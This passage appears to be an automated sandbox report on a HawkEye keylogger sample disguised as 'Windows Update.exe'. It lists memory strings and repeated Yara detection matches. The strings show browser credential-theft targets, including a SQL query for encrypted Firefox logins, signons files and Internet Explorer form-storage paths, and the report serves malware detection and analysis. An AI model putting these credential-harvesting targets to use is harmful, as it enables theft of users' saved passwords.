0000000A.00000002.389429585.0000000004AE2000.00000040.00000001.sdmp, Windows Update.exe, 0000000A.00000000.347967059.0000000004A50000.00000004.00020000.sdmp, Windows Update.exe, 0000000A.00000002.387761153.00000000038C1000.00000004.00000001.sdmp, vbc.exe, 00000010.00000000.331574384.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000010.00000002.343556416.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000010.00000000.331207385.0000000000400000.00000040.00000001.sdmpString found in binary or memory: @nss3.dllSOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\seamonkey.exe%programfiles%\Sea MonkeySOFTWARE\Mozillamozilla%s\binPathToExe%programfiles%\Mozilla FirefoxSELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins.---signons.txtsignons2.txtsignons3.txtsignons.sqlitenetmsg.dllUnknown Error\Error %d: %seditkernel32.dll... open %2.2X %s (%s)Microsoft_WinInetMicrosoft_WinInet_u7@dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.datSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
          Source: 5.exe, 00000001.00000002.269857758.00000000148A0000.00000004.00000001.sdmp, 5.exe, 00000002.00000002.291364573.0000000004A00000.00000004.00000001.sdmp, 5.exe, 00000002.00000002.291429637.0000000004A90000.00000004.00020000.sdmp, 5.exe, 00000002.00000001.265812009.0000000000414000.00000040.00020000.sdmp, 5.exe, 00000002.00000002.291267460.0000000003861000.00000004.00000001.sdmp, 5.exe, 00000002.00000002.290361151.0000000000400000.00000040.00000001.sdmp, 5.exe, 00000002.00000002.291521813.0000000004B22000.00000040.00000001.sdmp, Windows Update.exe, 00000006.00000002.309901601.00000000147A0000.00000004.00000001.sdmp, Windows Update.exe, 0000000A.00000002.388678020.00000000049C9000.00000004.00000001.sdmp, Windows Update.exe, 0000000A.00000000.353745665.00000000038C1000.00000004.00000001.sdmp, Windows Update.exe, 0000000A.00000000.306182092.0000000000414000.00000040.00000001.sdmp, Windows Update.exe, 0000000A.00000000.351268586.0000000000400000.00000040.00000001.sdmp, Windows Update.exe, 0000000A.00000002.389429585.0000000004AE2000.00000040.00000001.sdmp, Windows Update.exe, 0000000A.00000000.347967059.0000000004A50000.00000004.00020000.sdmp, Windows Update.exe, 0000000A.00000002.387761153.00000000038C1000.00000004.00000001.sdmp, vbc.exe, 00000010.00000000.331574384.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000010.00000002.343556416.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000010.00000000.331207385.0000000000400000.00000040.00000001.sdmpString found in binary or memory: @nss3.dllSOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\seamonkey.exe%programfiles%\Sea MonkeySOFTWARE\Mozillamozilla%s\binPathToExe%programfiles%\Mozilla FirefoxSELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins.---signons.txtsignons2.txtsignons3.txtsignons.sqlitenetmsg.dllUnknown Error\Error %d: %seditkernel32.dll... open %2.2X %s (%s)Microsoft_WinInetMicrosoft_WinInet_u7@dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.datSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
          Source: 5.exe, Windows Update.exe, vbc.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
          Source: vbc.exe, 00000010.00000003.341427101.000000000224F000.00000004.00000001.sdmp, vbc.exe, 00000010.00000003.341765641.000000000224C000.00000004.00000001.sdmp, vbc.exe, 00000010.00000003.343112039.000000000224C000.00000004.00000001.sdmp, vbc.exe, 00000010.00000003.341513562.000000000224C000.00000004.00000001.sdmp, vbc.exe, 00000010.00000003.343137621.000000000224F000.00000004.00000001.sdmpString found in binary or memory: https://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=5864849777998;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://login.microsoftonline.com/common/oauth2/authorize?client_id=9ea1ad79-fdb6-4f9a-8bc3-2b70f96e34c7&response_type=id_token&nonce=5cc75168-41b2-44e1-97be-a6965c7dcef4&redirect_uri=https%3a%2f%2fwww.bing.com%2forgid%2fidtoken%2fnosignin&scope=openid&response_mode=form_post&msafed=0&prompt=none&state=%7b%22ig%22%3a%2241C163740D104A3C92254F8DC4EFA2A6%22%7dhttps://login.microsoftonline.com/common/oauth2/authorizehttp://go.microsoft.com/fwlink/?LinkId=838604http://go.microsoft.com/fwlink/http://go.microsoft.com/fwlink/p/?LinkId=255141http://go.microsoft.com/fwlink/p/https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=160&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.phphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=5&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1https://contextual.media.net/medianet.phphttps://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=125&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=3&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://www.bing.com/search?q=chrome&src=IE-SearchBox&FORM=IESR4A&pc=EUPP_https://www.bing.com/searchhttps://www.bing.com/orgid/idtoken/nosigninhttps://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=3931852188168;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fthank-you.html%3Fstatcb%3D0%26installdataindex%3Dempty%26defaultbrowser%3D0?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=3931852188168;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fthank-you.html%3Fstatcb%3D0%26installdataindex%3Dempty%26defaultbrowser%3D0https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=5864849777998;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2F?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=5864849777998;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=4842492154761;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2F?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=4842492154761;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttp://www.msn.com/?ocid=iehphttp://www.msn.com/http://
          Source: vbc.exe, 00000010.00000003.341427101.000000000224F000.00000004.00000001.sdmp, vbc.exe, 00000010.00000003.341765641.000000000224C000.00000004.00000001.sdmp, vbc.exe, 00000010.00000003.343112039.000000000224C000.00000004.00000001.sdmp, vbc.exe, 00000010.00000003.341513562.000000000224C000.00000004.00000001.sdmp, vbc.exe, 00000010.00000003.343137621.000000000224F000.00000004.00000001.sdmpString found in binary or memory: https://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=5864849777998;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://login.microsoftonline.com/common/oauth2/authorize?client_id=9ea1ad79-fdb6-4f9a-8bc3-2b70f96e34c7&response_type=id_token&nonce=5cc75168-41b2-44e1-97be-a6965c7dcef4&redirect_uri=https%3a%2f%2fwww.bing.com%2forgid%2fidtoken%2fnosignin&scope=openid&response_mode=form_post&msafed=0&prompt=none&state=%7b%22ig%22%3a%2241C163740D104A3C92254F8DC4EFA2A6%22%7dhttps://login.microsoftonline.com/common/oauth2/authorizehttp://go.microsoft.com/fwlink/?LinkId=838604http://go.microsoft.com/fwlink/http://go.microsoft.com/fwlink/p/?LinkId=255141http://go.microsoft.com/fwlink/p/https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=160&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.phphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=5&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1https://contextual.media.net/medianet.phphttps://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=125&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=3&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://www.bing.com/search?q=chrome&src=IE-SearchBox&FORM=IESR4A&pc=EUPP_https://www.bing.com/searchhttps://www.bing.com/orgid/idtoken/nosigninhttps://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=3931852188168;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fthank-you.html%3Fstatcb%3D0%26installdataindex%3Dempty%26defaultbrowser%3D0?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=3931852188168;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fthank-you.html%3Fstatcb%3D0%26installdataindex%3Dempty%26defaultbrowser%3D0https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=5864849777998;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2F?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=5864849777998;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=4842492154761;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2F?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=4842492154761;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttp://www.msn.com/?ocid=iehphttp://www.msn.com/http://

          Key, Mouse, Clipboard, Microphone and Screen Capturing:

          barindex
          Yara detected HawkEye KeyloggerShow sources
          Source: Yara matchFile source: 10.0.Windows Update.exe.4b3fa72.56.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.5.exe.4a5dc92.9.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.5.exe.4b28208.18.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.4a50000.52.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.4aadc72.51.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.5.exe.415058.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.38c3258.47.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.5.exe.400000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.41b460.39.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.Windows Update.exe.41ce65.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.4a56408.32.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.415058.18.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.38cb065.46.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.38c3258.25.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.4ae9c0d.34.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.4a57e0d.53.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.Windows Update.exe.4a50000.15.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.5.exe.400000.13.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.5.exe.415058.16.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.Windows Update.exe.400000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.49d0e2d.26.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.5.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.5.exe.41b460.11.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.5.exe.41b460.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.Windows Update.exe.38c3258.7.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.5.exe.41b460.14.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.5.exe.4a90000.12.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.Windows Update.exe.4a26c92.9.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.5.exe.4b29c0d.17.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.400000.7.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.Windows Update.exe.147a0000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.5.exe.415058.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.400000.13.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.5.exe.4a07e2d.10.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.Windows Update.exe.4a57e0d.13.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.5.exe.400000.7.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.4ae8208.35.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.Windows Update.exe.4ae9c0d.19.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.5.exe.4a97e0d.11.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.Windows Update.exe.4b3fa72.17.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.38c3258.47.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.4a50000.52.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.5.exe.148b1458.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.5.exe.400000.9.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.Windows Update.exe.147b1458.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.5.exe.415058.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.5.exe.4a06428.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.5.exe.148b1458.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.415058.18.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.5.exe.41ce65.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.5.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.1.Windows Update.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.Windows Update.exe.38c3258.7.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.5.exe.3863258.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.4a26c92.50.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.4a57e0d.29.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.400000.19.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.4a56408.54.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.49cf428.28.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.5.exe.4a90000.12.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.4a50000.30.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.Windows Update.exe.415058.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.Windows Update.exe.4a50000.15.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.415058.12.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.Windows Update.exe.4aadc72.14.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.5.exe.415058.12.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.5.exe.3863258.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.Windows Update.exe.400000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.41b460.20.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.41ce65.17.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.38c9660.23.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.5.exe.415058.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.5.exe.41ce65.15.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.38cb065.24.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.Windows Update.exe.415058.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.5.exe.148b9265.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.5.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.Windows Update.exe.49cf428.11.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.41b460.10.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.Windows Update.exe.41b460.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.400000.9.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.4b3fa72.36.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.5.exe.4b7fa72.16.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.5.exe.386b065.7.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.4a50000.30.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.415058.41.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.5.exe.4aedc72.13.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.Windows Update.exe.147a0000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.38c3258.25.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.5.exe.3869660.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.4ae0000.33.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.5.exe.148a0000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.49d0e2d.49.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.1.Windows Update.exe.41ce65.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.38c9660.45.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.Windows Update.exe.147b1458.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.4a26c92.27.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.5.exe.148b7860.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.4ae9c0d.57.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.41ce65.15.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.5.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.1.Windows Update.exe.415058.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.5.exe.148a0000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.Windows Update.exe.38cb065.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.41b460.16.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.5.exe.415058.16.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.400000.19.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.4aadc72.31.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.Windows Update.exe.4ae0000.16.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.Windows Update.exe.49d0e2d.10.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.1.Windows Update.exe.41b460.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.5.exe.41ce65.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.415058.14.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.Windows Update.exe.147b9265.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.4ae0000.55.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.41ce65.11.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.5.exe.4b20000.15.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.415058.14.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.1.Windows Update.exe.415058.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.4ae8208.58.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.Windows Update.exe.4ae8208.18.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.5.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.400000.40.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.Windows Update.exe.147b7860.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.Windows Update.exe.4a56408.12.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.5.exe.400000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.415058.41.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.Windows Update.exe.38c9660.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.49cf428.48.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.5.exe.415058.12.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.415058.12.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.5.exe.4a96408.14.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.400000.40.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.5.exe.41b460.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.41ce65.42.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.5.exe.41ce65.10.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.Windows Update.exe.28e9124.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.28e9124.22.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.28e9124.43.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000006.00000002.309901601.00000000147A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.388678020.00000000049C9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.269857758.00000000148A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000015.00000000.380004808.0000000000414000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.306182092.0000000000414000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.351268586.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.353745665.00000000038C1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.304487124.0000000000414000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.291364573.0000000004A00000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000015.00000002.405506520.0000000004A60000.00000004.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.347861832.00000000049C9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.389429585.0000000004AE2000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.342960514.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.291429637.0000000004A90000.00000004.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000001.265812009.0000000000414000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000015.00000001.382890581.0000000000414000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.385835641.00000000148A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.291267460.0000000003861000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.264178503.0000000000414000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.347967059.0000000004A50000.00000004.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000002.415513797.0000000005980000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000015.00000002.403603972.00000000038D1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000015.00000002.405826731.0000000004AF2000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.354086435.0000000004A50000.00000004.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.347403279.00000000038C1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.290361151.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.265043161.0000000000414000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.389248148.0000000004A50000.00000004.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.354358583.0000000004AE2000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000015.00000002.400775049.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000001.307043885.0000000000414000.00000040.00020000.sdmp, type: MEMORY
